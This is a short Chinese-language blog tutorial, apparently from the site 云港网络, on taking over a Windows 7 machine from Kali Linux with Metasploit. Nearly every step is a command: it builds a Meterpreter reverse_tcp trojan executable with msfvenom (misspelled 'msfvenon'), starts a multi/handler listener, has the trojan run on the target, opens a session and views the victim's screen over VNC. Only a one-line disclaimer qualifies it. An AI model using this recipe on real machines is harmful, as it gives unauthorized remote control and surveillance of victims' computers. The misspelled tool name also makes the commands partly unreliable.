kali msf渗透windows

图片[1]-kali msf渗透windows-云港网络

准备:
`kali 20.2.1`
`Win 7(当靶机)`
`msfvenon`
`msfconsole`
<!–more–>
1.首先以root身份运行终端并使用`ifconfig`查看IP
“`shell
sudo su
“`
“`shell
ifconfig
“`
2.创建木马
“`shell
msfvenon -p windows/meterpreter/reverse_tcp lhost=<kali的IP> lport=<本地端口> -f exe > <自定义名称>.exe
“`
注:<kali的IP>是指刚刚用命令`ifconfig`看到的IP地址
而<本地端口>是自定义没有被占用的端口(范围为1111-9999)
3.运行msf控制台
“`shell
msfconsole
“`
4.选择模块
“`shell
use exploit/multi/handler
“`
5.选择攻击模块
“`shell
set payload windows/meterpreter/reverse_tcp
“`
6.设置攻击方的IP
“`shell
set LHOST <kali的IP>
“`
7.设置监听端口
“`shell
set lport <本地端口>
“`
8.开始监听
可以使用`exploit`
“`shell
exploit
“`
注:exploit是监听到靶机后自动选择第一个
也可以使用`exploit -z -j`
“`shell
exploit -z -j
“`
9.最后把木马放到靶机里,运行就渗透成功了
10.查看用户`sessions`(仅限使用了`exploit -z -j`使用)
“`shell
sessions
“`
11.选择攻击用户`sessions -i`(也是仅限使用了`exploit -z -j`使用)
使用方式为`sessions -i <数字>`
例如:
“`shell
sessions -i 1
“`
攻击第一个用户
12.查看靶机电脑画面
“`shell
run vnc -i
“`
———————请勿用于违法犯罪———————

© 版权声明
THE END
喜欢就支持一下吧
点赞13.8W+ 分享
system-zdy的头像-云港网络
评论 抢沙发

请登录后发表评论

    暂无评论内容